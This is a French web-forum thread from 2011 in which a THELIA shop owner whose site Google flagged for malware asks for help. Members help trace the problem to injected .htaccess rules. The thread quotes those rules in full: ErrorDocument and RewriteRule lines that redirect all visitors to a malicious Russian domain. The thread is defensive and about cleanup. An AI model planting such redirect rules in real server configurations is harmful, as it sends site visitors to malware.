THELIA Forum

Welcome to the THELIA support and discusssion forum

Announcement

Rejoignez la communauté sur le Discord Thelia : https://discord.gg/YgwpYEE3y3

Offline

#1 Malware, badware

(26-07-2011 14:27:16)

Bonjour.

J'ai reçu un message de Google me disant que mon site present un risque de malware et que mon compte adwords sera suspendu à cause. Avez vous une experience de cela et comment gérer ? Merci d'avance

Offline

#2 Re: Malware, badware

(27-07-2011 02:28:14)

Voir avec eux a partir de ton compte 'webmaster google'
pour verifier l'info et eventuelement leur poser la question...

le-bouquiniste.com                                                      tongue  plugin 1.4.x / 1.5   => valeurstock / Mailpaiement / formcontact

Offline

#3 Re: Malware, badware

(27-07-2011 03:08:19)

tiens je t'ai trouve ce lien https://www.google.com/support/webmaste … opic=25531

le-bouquiniste.com                                                      tongue  plugin 1.4.x / 1.5   => valeurstock / Mailpaiement / formcontact

Offline

#4 Re: Malware, badware

(27-07-2011 08:43:43)

Est ce que ce code, venant de la page index_page.html, ressemble à du malveilant pour vous?

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">

try {
var pageTracker = _gat._getTracker("UA-6067237-2");
pageTracker._trackPageview();
} catch(err) {}</script>

ou ça

<script src='js/jquery.js' type='text/javascript'></script>
<script src='js/panier.js' type='text/javascript'></script>

ou ça

<script language="JavaScript" type="text/javascript" src="js/wz_tooltip.js"></script>

Offline

#5 Re: Malware, badware

(27-07-2011 09:01:26)

reg wrote:

Voir avec eux a partir de ton compte 'webmaster google'
pour verifier l'info et eventuelement leur poser la question...

ça j'ai fait. il me dit


URL : http://mjlvideo.fr/favicon.ico
Date de la dernière vérification :26 juillet 2011

"Lors du dernier test de la page par Google, le contenu renvoyé par votre serveur a redirigé le navigateur vers un site contenant des logiciels malveillants. Malheureusement, Google n'a pas été en mesure d'isoler le code malveillant sur la page."

Last edited by markjl (27-07-2011 09:02:17)

Offline

#6 Re: Malware, badware

(27-07-2011 09:31:51)

ou ça? je cherche du code 'script'

<!-- Google Code for entre en index et fait une recherche en boutique Conversion Page -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1036881510;
var google_conversion_language = "fr";
var google_conversion_format = "2";
var google_conversion_color = "ffffff";
var google_conversion_label = "j14dCObN8wEQ5py27gM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>

Offline

#7 Re: Malware, badware

(27-07-2011 10:35:11)

Quand j'ouvre la page principale Chrome dit en attente de 'fast-time.ru'
Je me demande si ça peut être lié.

Offline

#8 Re: Malware, badware

(27-07-2011 12:52:49)

J'ai trouvé le code suivant dans mon fichier .htaccess de racine grace à

https://badwarebusters.org/main/itemvie … lock-25789

ErrorDocument 400 http://fast-time.ru/mkimg/index.php
ErrorDocument 401 http://fast-time.ru/mkimg/index.php
ErrorDocument 403 http://fast-time.ru/mkimg/index.php
ErrorDocument 404 http://fast-time.ru/mkimg/index.php
ErrorDocument 500 http://fast-time.ru/mkimg/index.php
RewriteRule ^(.*)$ http://fast-time.ru/mkimg/index.php [R=301,L]

Last edited by markjl (27-07-2011 12:54:43)

Offline

#9 Re: Malware, badware

(27-07-2011 13:31:29)

Ton index.php n'existe pas...
Sur la page fast-Time.ru il dit que tu dois mettre ton site dans public- html....

Last edited by JPCréativ' (27-07-2011 13:33:09)

http://jpcreativlogo.com

Offline

#10 Re: Malware, badware

(28-07-2011 04:09:09)

J'ai trouvé le code suivant dans mon fichier .htaccess

Le mot trouve sous entend que ce n'est pas toi qui l'as mis en place,
donc "quelqu'un" a pirate ton site hmm
Par contre fast-time.ru est clairement indique malvaillant par firefox (pas par IE)
difficile d'en vouloir a google...

le-bouquiniste.com                                                      tongue  plugin 1.4.x / 1.5   => valeurstock / Mailpaiement / formcontact

Offline

#11 Re: Malware, badware

(19-08-2011 09:46:00)

Je n'en veux pas à Google. C'est grace à eux que je l'ai su. J'ai appris que j'avais laissé le fichier en droit 777 (RW). Après, je ne remercie pas la personne qui y a inséré du code malveillant.

P.S. Tous les fichiers remis en 755.